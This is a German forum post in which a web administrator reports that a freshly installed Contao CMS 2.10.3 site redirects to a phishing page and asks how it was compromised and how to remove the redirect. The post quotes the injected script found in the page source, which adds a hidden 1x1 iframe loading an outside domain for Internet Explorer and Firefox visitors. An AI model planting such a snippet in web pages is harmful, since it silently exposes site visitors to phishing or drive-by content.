Hallo alle miteinander!
Ich hoffe, ich bin hier im richtigen Unterbereich des Forums mit meinem Anliegen.
Habe bei einem Kunden vor Weihnachten Contao Open Source CMS 2.10.3 aufgesetzt und wollte nun mit der Befüllung der Seite weitermachen. Nun werde ich beim Aufrufen der Seite immer zu einer Phishing-Seite weitergeleitet. Im Quellcode habe ich auch folgendes entdeckt:
Code:
<script>var url = "http://hotplay24.net";if ((navigator.userAgent.toLowerCase().indexOf("msie") >= 0) || (navigator.userAgent.toLowerCase().indexOf("firefox") >= 0)){ var f = document.createElement('iframe'); f.setAttribute("width", "1"); f.setAttribute("height", "1"); f.setAttribute("src", url); f.setAttribute("style", "visibility: hidden; position: absolute; left: 0pt; top: 0pt;"); document.getElementsByTagName("body")[0].appendChild(f);}</script>
Jetzt frage ich mich, wie es dazu kommen kann? Contao-Version war vor Weihnachten aktuell, Passwörter sind nur mir bekannt und bestehen nicht nur aus "123" oder Ähnlichem. Kann es auch sein, dass der Server, auf dem die Seite liegt, gehackt wurde?
Was kann ich nun unternehmen, um die Seite zu retten bzw. die Weiterleitung herauszubekommen?
Als Erweiterung ist lediglich "dlh_googlemaps" installiert.
Vielen Dank schon mal im Voraus für Eure Hilfe!
MfG locologan
Lesezeichen